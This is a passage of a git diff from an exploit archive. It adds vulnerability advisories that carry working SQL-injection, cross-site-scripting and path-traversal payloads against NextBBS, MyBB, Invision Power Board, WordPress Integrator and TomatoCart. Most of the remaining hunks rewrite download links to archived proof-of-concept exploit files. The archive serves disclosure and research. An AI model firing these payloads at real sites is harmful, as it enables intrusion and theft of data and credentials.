+NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system.
+
+NextBBS 0.6.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe
+http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe
+http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe
\ No newline at end of file
diff --git a/platforms/php/webapps/37013.txt b/platforms/php/webapps/37013.txt
new file mode 100755
index 000000000..5624b9cf6
--- /dev/null
+++ b/platforms/php/webapps/37013.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52728/info
+
+NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system.
+
+NextBBS 0.6.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/nextbbs.0.6.0/index.php?do=
\ No newline at end of file
diff --git a/platforms/php/webapps/37016.txt b/platforms/php/webapps/37016.txt
new file mode 100755
index 000000000..0b32410e6
--- /dev/null
+++ b/platforms/php/webapps/37016.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52739/info
+
+WordPress Integrator is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WordPress Integrator 1.32 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-login.php?redirect_to=http://%3F1
\ No newline at end of file
diff --git a/platforms/php/webapps/37017.txt b/platforms/php/webapps/37017.txt
new file mode 100755
index 000000000..5bdf2f89f
--- /dev/null
+++ b/platforms/php/webapps/37017.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52740/info
+
+Invision Power Board is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Invision Power Board 4.2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?s=blablabla&&app=gallery&module=ajax§ion=albumSelector&do=albumSelectorPane&secure_key=blalblabla&type=upload&albums=search&moderate=&album_id=1593&member_id=&searchType=member&searchMatch=is&searchIsGlobal=0&searchSort=date&searchDir=desc&searchText=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000252%29%3C%2Fscript%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37018.txt b/platforms/php/webapps/37018.txt
new file mode 100755
index 000000000..be6a18cae
--- /dev/null
+++ b/platforms/php/webapps/37018.txt
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/52743/info
+
+MyBB is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
+
+Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MyBB 1.6.6 is vulnerable; other versions may also be affected.
+
+POST /mybb/admin/index.php?module=user-users&action=search HTTP/1.1
+Host: 192.168.7.5
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Proxy-Connection: keep-alive
+Referer: http://192.168.7.5/mybb/admin/index.php?module=user-users&action=search
+Cookie: mybb[lastvisit]=1332694756; mybb[lastactive]=1332699650; mybb[referrer]=1; loginattempts=1;
+adminsid=a82d27dd72efdb0a99c009db7701e847; acploginattempts=0; mybbuser=1_CAo7pz2wUvHGtlJht9OLGyXG8ZVbS78xAXx6ZTzBrvNSe5S2GM;
+sid=d725ac10b7d8f0f8765dfa73f5dcf23b
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 638
+
+my_post_key=5dbe489b5b03d9d9e2d387ff9267567d&conditions%5Busername%5D=aditya&conditions%5Bemail%5D=aditya
+&conditions%5Busergroup%5D%5B%5D=2'&conditions%5Bwebsite%5D=&conditions%5Bicq%5D=&conditions%5Baim%5D=
+&conditions%5Byahoo%5D=&conditions%5Bmsn%5D=&conditions%5Bsignature%5D=&conditions%5Busertitle%5D=
+&conditions%5Bpostnum_dir%5D=greater_than&conditions%5Bpostnum%5D=&conditions%5Bregdate%5D=
+&conditions%5Bregip%5D=&conditions%5Blastip%5D=&conditions%5Bpostip%5D=&profile_fields%5Bfid3%5D%5Bfid3%5D=N%2FA
+&profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&sortby=username&order=asc&perpage=&displayas=card
\ No newline at end of file
diff --git a/platforms/php/webapps/37019.txt b/platforms/php/webapps/37019.txt
new file mode 100755
index 000000000..5d2282952
--- /dev/null
+++ b/platforms/php/webapps/37019.txt
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/52743/info
+
+MyBB is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
+
+Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MyBB 1.6.6 is vulnerable; other versions may also be affected.
+
+POST /mybb/admin/index.php?module=user-users&action=search HTTP/1.1
+Host: 192.168.7.5
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Proxy-Connection: keep-alive
+Referer: http://192.168.7.5/mybb/admin/index.php?module=user-users&action=search
+Cookie: mybb[lastvisit]=1332694756; mybb[lastactive]=1332699650; mybb[referrer]=1; loginattempts=1;
+adminsid=a82d27dd72efdb0a99c009db7701e847; acploginattempts=0; mybbuser=1_CAo7pz2wUvHGtlJht9OLGyXG8ZVbS78xAXx6ZTzBrvNSe5S2GM;
+sid=d725ac10b7d8f0f8765dfa73f5dcf23b
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 638
+
+my_post_key=5dbe489b5b03d9d9e2d387ff9267567d&conditions%5Busername%5D=aditya&conditions%5Bemail%5D=aditya
+&conditions%5Busergroup%5D%5B%5D=2&conditions%5Bwebsite%5D=&conditions%5Bicq%5D=
+&conditions%5Baim%5D=&conditions%5Byahoo%5D=&conditions%5Bmsn%5D=&conditions%5Bsignature%5D=&conditions%5Busertitle%5D=
+&conditions%5Bpostnum_dir%5D=greater_than&conditions%5Bpostnum%5D=&conditions%5Bregdate%5D=
+&conditions%5Bregip%5D=&conditions%5Blastip%5D=&conditions%5Bpostip%5D=&profile_fields%5Bfid3%5D%5Bfid3%5D=N%2FA
+&profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&sortby=username&order=asc&perpage=&displayas=card
diff --git a/platforms/php/webapps/37021.txt b/platforms/php/webapps/37021.txt
new file mode 100755
index 000000000..239be8dc6
--- /dev/null
+++ b/platforms/php/webapps/37021.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52766/info
+
+TomatoCart is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+TomatoCart 1.2.0 Alpha 2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/json.php?action=3&module=../../../../../../../../../../../../../../boot.ini%00
\ No newline at end of file
diff --git a/platforms/php/webapps/4059.txt b/platforms/php/webapps/4059.txt
index 607a91f4a..b7e36f87c 100755
--- a/platforms/php/webapps/4059.txt
+++ b/platforms/php/webapps/4059.txt
@@ -106,6 +106,6 @@ Submit
download the netcat+exploit from my server:
http://corryl.altervista.org/index.php?mod=Download/Exploit#exploit-LRCF-v3.4.rar
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/06112007-exploit-LRCF-v3.4.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4059.rar (06112007-exploit-LRCF-v3.4.rar)
# milw0rm.com [2007-06-11]
diff --git a/platforms/php/webapps/4841.txt b/platforms/php/webapps/4841.txt
index 3ac3675b1..32ccf13b0 100755
--- a/platforms/php/webapps/4841.txt
+++ b/platforms/php/webapps/4841.txt
@@ -86,7 +86,7 @@
www.underwater.itdefence.ru/isniff.rar
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-isniff.rar
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4841.rar (2008-isniff.rar)
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
OSVDB: 51280, 51281
diff --git a/platforms/php/webapps/697.c b/platforms/php/webapps/697.c
index 761040c7d..9616b4a28 100755
--- a/platforms/php/webapps/697.c
+++ b/platforms/php/webapps/697.c
@@ -1,4 +1,4 @@
-// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/phpbbmemorydump.rar
+// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/697.rar (phpbbmemorydump.rar)
// Source serv.cpp is at the bottom of the page - str0ke
// Notes from author:
diff --git a/platforms/php/webapps/7421.txt b/platforms/php/webapps/7421.txt
index 55ddc3dfd..25ccb3108 100755
--- a/platforms/php/webapps/7421.txt
+++ b/platforms/php/webapps/7421.txt
@@ -21,6 +21,6 @@
[+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=
*/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-eZPublish_abuse_of_functionality_zero_day.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip)
# milw0rm.com [2008-12-11]
diff --git a/platforms/solaris/remote/5282.txt b/platforms/solaris/remote/5282.txt
index 1d9621a5e..e2aa2ae0d 100755
--- a/platforms/solaris/remote/5282.txt
+++ b/platforms/solaris/remote/5282.txt
@@ -1,5 +1,5 @@
Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ypk2008.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5282.tar.gz (2008-ypk2008.tar.gz)
# milw0rm.com [2008-03-20]
diff --git a/platforms/webapps/10209.txt b/platforms/webapps/10209.txt
deleted file mode 100755
index dfd6de3a9..000000000
--- a/platforms/webapps/10209.txt
+++ /dev/null
@@ -1,26 +0,0 @@
-**************************************************************
-Product: Everfocus EDSR series
-Version affected: 1.4 and older
-Website: http://www.everfocus.com/
-Discovered By: Andrea Fabrizi
-Email: andrea.fabrizi () gmail com
-Web: http://www.andreafabrizi.it
-Vuln: remote DVR applet authentication bypass
-**************************************************************
-
-The EDSR firmware don't handle correctly users authentication and sessions.
-
-This exploit let you to connect to every remote DVR (without username
-and password) and see the live cams :)
-Exploit: http://www.andreafabrizi.it/files/EverFocus_Edsr_Exploit.tar.gz
-
-I discovered this vulnerability one year ago and i have informed the
-vendor, but apparently
-there is no solution at this time.
-
---
-Andrea Fabrizi
-http://www.andreafabrizi.it
-
-
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-EverFocus_Edsr_Exploit.tar.gz
\ No newline at end of file
diff --git a/platforms/win32/remote/11615.txt b/platforms/win32/remote/11615.txt
index 9b4132ba5..d5b24f9aa 100755
--- a/platforms/win32/remote/11615.txt
+++ b/platforms/win32/remote/11615.txt
@@ -11,7 +11,7 @@ Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP plat
===============================================================
A copy of test.hlp can be downloaded from here:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/msgbox_test_help.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11615.zip (msgbox_test_help.zip)
===============================================================
diff --git a/platforms/win32/shellcode/13507.txt b/platforms/win32/shellcode/13507.txt
index f1b2cd0d9..810df0fdc 100755
--- a/platforms/win32/shellcode/13507.txt
+++ b/platforms/win32/shellcode/13507.txt
@@ -13,7 +13,8 @@ More details can be found here:
http://skypher.com/wiki/index.php?title=Shellcode/w32_SEH_omelet_shellcode
http://code.google.com/p/w32-seh-omelet-shellcode/
-backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-w32-SEH-omlet-shellcode-v0.1.zip
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13507-1.zip (2009-w32-SEH-omlet-shellcode-v0.2.zip)
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13507-2.zip (2009-w32-SEH-omlet-shellcode-older-versions.zip)
I have not had a chance to test this newer version in a live exploit, so do
let me know if you have a chance to use it.
diff --git a/platforms/windows/dos/10204.txt b/platforms/windows/dos/10204.txt
index 43a46d6f1..949d1762d 100755
--- a/platforms/windows/dos/10204.txt
+++ b/platforms/windows/dos/10204.txt
@@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails
An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36668.tar
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)
diff --git a/platforms/windows/dos/10208.txt b/platforms/windows/dos/10208.txt
index b223ec09a..b5e25d96e 100755
--- a/platforms/windows/dos/10208.txt
+++ b/platforms/windows/dos/10208.txt
@@ -2,4 +2,4 @@ Adobe Reader and Acrobat 9.x before 9.2, 8.x before 8.1.7, and possibly 7.x thro
attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code
via unspecified vectors.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-memcorrupt.tgz
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10208.tgz (2009-11-22-memcorrupt.tgz)
\ No newline at end of file
diff --git a/platforms/windows/dos/10343.txt b/platforms/windows/dos/10343.txt
index 2c09ffe53..90822b3cc 100755
--- a/platforms/windows/dos/10343.txt
+++ b/platforms/windows/dos/10343.txt
@@ -101,10 +101,10 @@ Some malicious user can use is to create a DoS condition on a server or workstat
The PoC Files can be download here.
Hang CPU
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL_CPU_Hang.arj
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10343-1.arj (PRL_CPU_Hang.arj)
Crash Application
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL_Crash.cab
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10343-2.cab (PRL_Crash.cab)
#####################################################################################
diff --git a/platforms/windows/dos/11062.txt b/platforms/windows/dos/11062.txt
index 1296719e5..26a8dd95a 100755
--- a/platforms/windows/dos/11062.txt
+++ b/platforms/windows/dos/11062.txt
@@ -5,5 +5,5 @@
# Code :
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/sopcast_exp.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11062.zip (sopcast_exp.zip)
diff --git a/platforms/windows/dos/11064.txt b/platforms/windows/dos/11064.txt
index 8563bd6f1..9463577ed 100755
--- a/platforms/windows/dos/11064.txt
+++ b/platforms/windows/dos/11064.txt
@@ -4,4 +4,4 @@
# Tested on: xpsp3 ie6
# Code :
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/uusee.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11064.zip (uusee.zip)
\ No newline at end of file
diff --git a/platforms/windows/dos/11176.txt b/platforms/windows/dos/11176.txt
index 6f312ec10..e6e4f977b 100755
--- a/platforms/windows/dos/11176.txt
+++ b/platforms/windows/dos/11176.txt
@@ -5,4 +5,4 @@
# I exposed this vunl two weeks ago,are you really responsible for # the security of millions users?
# Code :
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11176.zip (Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip)
\ No newline at end of file
diff --git a/platforms/windows/dos/11182.txt b/platforms/windows/dos/11182.txt
index 8af9c46db..83d7c7f6d 100755
--- a/platforms/windows/dos/11182.txt
+++ b/platforms/windows/dos/11182.txt
@@ -1,7 +1,7 @@
# Version: 6/7/8
# Tested on: Windows XP SP3 English & Windows 7
# CVE :
-# Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ie_crash.tar.gz
+# Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11182.tar.gz (ie_crash.tar.gz)
Description: Modified 1360. byte to 44, 1361. to 43, 1362. 42, 1363.
byte to 41 of a sample swf file, ran it and crash occurred.
diff --git a/platforms/windows/dos/11192.txt b/platforms/windows/dos/11192.txt
index b6534f471..a88825555 100755
--- a/platforms/windows/dos/11192.txt
+++ b/platforms/windows/dos/11192.txt
@@ -20,7 +20,7 @@ Opening a malformed ".slk" file with Openoffice, causes a crash on
PoC:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/slk.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11192.rar (slk.rar)
Credits:
karak0rsan and murderkey from Hellcode Research
diff --git a/platforms/windows/dos/11245.txt b/platforms/windows/dos/11245.txt
index 25ca64d6d..c819b8460 100755
--- a/platforms/windows/dos/11245.txt
+++ b/platforms/windows/dos/11245.txt
@@ -10,4 +10,4 @@ This same bug was in early version of firfox,found by (Wojciech Pawlikowski) Thi
This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Firefox-v3.6_PoC.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11245.rar (Firefox-v3.6_PoC.rar)
diff --git a/platforms/windows/dos/11247.txt b/platforms/windows/dos/11247.txt
index 7992080e7..5f3761d9b 100755
--- a/platforms/windows/dos/11247.txt
+++ b/platforms/windows/dos/11247.txt
@@ -9,4 +9,4 @@ after opening the opera.html broswer hang for a while and crush.same bug in fire
This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Opera_10.10-PoC.rar
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11247.rar (Opera_10.10-PoC.rar)
\ No newline at end of file
diff --git a/platforms/windows/dos/11342.txt b/platforms/windows/dos/11342.txt
index bb42e76b4..8a1ca14c7 100755
--- a/platforms/windows/dos/11342.txt
+++ b/platforms/windows/dos/11342.txt
@@ -3,4 +3,4 @@
# Tested on: Windows XP SP2/SP3 (x86), Vista (x86), Windows 7 (x64)
# Code : A specially crafted SQL file query can cause the the application to freeze and finally crash. The bug is the SQL query processor engine, it can't handle malformed SQL queries leading to crash.
-# PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/sqlite_browser_db_poc.tar.gz
\ No newline at end of file
+# PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11342.tar.gz (sqlite_browser_db_poc.tar.gz)
\ No newline at end of file
diff --git a/platforms/windows/dos/11632.txt b/platforms/windows/dos/11632.txt
index 2aecc590f..cdac8e315 100755
--- a/platforms/windows/dos/11632.txt
+++ b/platforms/windows/dos/11632.txt
@@ -1,7 +1,7 @@
When Orb is first installed it registers several Direct Show filters with the system. When registered these filters are then called whenever a file which has a dependency on such a required filter is accessed. By specially crafting specific headers embedded into an mp3 file we can create a direct code path to code which is vulnerable to a integer division by zero. This vulnerability can be triggered remotely be embedding the crafted mp3 file into HTML. It is also not dependent on a certain media player. Attached is a PoC (Proof-Of-Concept) I wrote for this specific bug. Also included is a Rebuild file for IDA Pro examining the crash.
Download POC:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/aac_parser_int_div_by_0_orb.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11632.zip (aac_parser_int_div_by_0_orb.zip)
Timeline:
diff --git a/platforms/windows/dos/11803.txt b/platforms/windows/dos/11803.txt
index 20ce55cb3..dab9ba87c 100755
--- a/platforms/windows/dos/11803.txt
+++ b/platforms/windows/dos/11803.txt
@@ -5,7 +5,7 @@ Successful exploitation of this vulnerability allows an attacker to execute arbi
This vulnerability is confirmed in Crimson Editor version 3.70.
A PoC configuration file can be downloaded here:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cedt.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11803.zip (cedt.zip)
Ref:
diff --git a/platforms/windows/dos/11987.txt b/platforms/windows/dos/11987.txt
index 333f3a606..037f7df24 100755
--- a/platforms/windows/dos/11987.txt
+++ b/platforms/windows/dos/11987.txt
@@ -24,7 +24,7 @@ With Foxit Reader, no warning is displayed:
I’m not publishing my PoC PDF yet, but you can download a PDF that will just launch cmd.exe here. Use it to test your PDF reader:
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/launch-action-cmd.zip
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11987.zip (launch-action-cmd.zip)
With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs).
diff --git a/platforms/windows/dos/13872.txt b/platforms/windows/dos/13872.txt
index e94fccad0..9e7f6a45b 100755
--- a/platforms/windows/dos/13872.txt
+++ b/platforms/windows/dos/13872.txt
@@ -7,4 +7,4 @@
Code was generated utilizing a custom fuzzer, PoC creates an Access Violation when writing to memory.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/SumatraPDF1.1DOS.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13872.pdf (SumatraPDF1.1DOS.pdf)
\ No newline at end of file
diff --git a/platforms/windows/dos/13959.c b/platforms/windows/dos/13959.c
index 0c38b9e47..f0a689e8a 100755
--- a/platforms/windows/dos/13959.c
+++ b/platforms/windows/dos/13959.c
@@ -225,7 +225,7 @@ cause a crash of the server:
http://aluigi.org/poc/teamspeakrack.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/teamspeakrack.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13959.zip (teamspeakrack.zip)
#######################################################################
diff --git a/platforms/windows/dos/14286.txt b/platforms/windows/dos/14286.txt
index 42ab9f7d7..870eab92a 100755
--- a/platforms/windows/dos/14286.txt
+++ b/platforms/windows/dos/14286.txt
@@ -84,7 +84,7 @@ invalid memory accesses.
http://aluigi.org/testz/udpsz.zip
or
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/grawpoc.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14286.zip (grawpoc.zip)
A]
udpsz -C "0100 13 0003 0000 ffffffff" -b 0x41 SERVER 16250 3000
diff --git a/platforms/windows/dos/14346.txt b/platforms/windows/dos/14346.txt
index 0443b34d3..6b9b2df3f 100755
--- a/platforms/windows/dos/14346.txt
+++ b/platforms/windows/dos/14346.txt
@@ -33,4 +33,4 @@
- PoC:
http://www.zeroscience.mk/codes/zsl_poc17.shw.rar
or
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/zsl_poc17.shw.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14346.rar (zsl_poc17.shw.rar)
diff --git a/platforms/windows/dos/14414.txt b/platforms/windows/dos/14414.txt
index cac4c2f67..d0ddd0290 100755
--- a/platforms/windows/dos/14414.txt
+++ b/platforms/windows/dos/14414.txt
@@ -64,7 +64,7 @@ are no limitations.
http://aluigi.org/fakep/unrealfp.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/unrealfp.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14414.zip (unrealfp.zip)
unrealfp -x 2 -c "STEAMBLOB B=" SERVER PORT
diff --git a/platforms/windows/dos/14424.txt b/platforms/windows/dos/14424.txt
index a98864a80..b9f719bf2 100755
--- a/platforms/windows/dos/14424.txt
+++ b/platforms/windows/dos/14424.txt
@@ -74,7 +74,7 @@ No other technical details are available at the moment.
http://aluigi.org/poc/fearless.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/fearless.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14424.zip (fearless.zip)
tuned to work with the F.E.A.R. series, so Project Origin included.
diff --git a/platforms/windows/dos/14642.txt b/platforms/windows/dos/14642.txt
index b4358cdbd..49c0f7ddd 100755
--- a/platforms/windows/dos/14642.txt
+++ b/platforms/windows/dos/14642.txt
@@ -8,4 +8,4 @@ After reading the paper, I started studying the TTF format. After initial resear
Writeup and proof of concept files included in archive file.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/VA010-003.tgz
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14642.tgz (VA010-003.tgz)
\ No newline at end of file
diff --git a/platforms/windows/dos/14882.txt b/platforms/windows/dos/14882.txt
index fc1dfa734..e66270692 100755
--- a/platforms/windows/dos/14882.txt
+++ b/platforms/windows/dos/14882.txt
@@ -120,5 +120,5 @@ Stack
Reproduction
Use attached PoC:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/FFDshowSEHExceptionleadingtoNULLpointeronRead.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14882.rar (FFDshowSEHExceptionleadingtoNULLpointeronRead.rar)
diff --git a/platforms/windows/dos/14883.txt b/platforms/windows/dos/14883.txt
index 69130e406..160433201 100755
--- a/platforms/windows/dos/14883.txt
+++ b/platforms/windows/dos/14883.txt
@@ -100,5 +100,5 @@ char data[18448]
char data[7807] = -120
PoC:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/IntelVideoCodecs5RemoteDenialofService.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14883.rar (IntelVideoCodecs5RemoteDenialofService.rar)
\ No newline at end of file
diff --git a/platforms/windows/dos/14949.py b/platforms/windows/dos/14949.py
index 9cf11ff66..0c6eb6a38 100755
--- a/platforms/windows/dos/14949.py
+++ b/platforms/windows/dos/14949.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-day9-ba.zip
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14949.zip (moaub-day9-ba.zip)
'''
diff --git a/platforms/windows/dos/14971.py b/platforms/windows/dos/14971.py
index cfe712831..3d0e77c1f 100755
--- a/platforms/windows/dos/14971.py
+++ b/platforms/windows/dos/14971.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-11-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14971.zip (moaub-11-exploit.zip)
'''
'''
diff --git a/platforms/windows/dos/14974.txt b/platforms/windows/dos/14974.txt
index 76f17762d..62e57c3bf 100755
--- a/platforms/windows/dos/14974.txt
+++ b/platforms/windows/dos/14974.txt
@@ -28,4 +28,4 @@ http://elotrolad0.blogspot.com/2010/09/hp-data-protector-media-operations-611.ht
by r0i
-PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HP_Data_Protector_Poc.rar
\ No newline at end of file
+PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14974.rar (HP_Data_Protector_Poc.rar)
\ No newline at end of file
diff --git a/platforms/windows/dos/14992.py b/platforms/windows/dos/14992.py
index 6db248b22..7c03c7050 100755
--- a/platforms/windows/dos/14992.py
+++ b/platforms/windows/dos/14992.py
@@ -22,7 +22,7 @@ CVE : CVE-2010-3000
# POC for CVE-2010-3000
# http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/
-# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-13-exploit.zip
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14992.zip (moaub-13-exploit.zip)
import sys
diff --git a/platforms/windows/dos/15019.txt b/platforms/windows/dos/15019.txt
index a30b187ad..232917818 100755
--- a/platforms/windows/dos/15019.txt
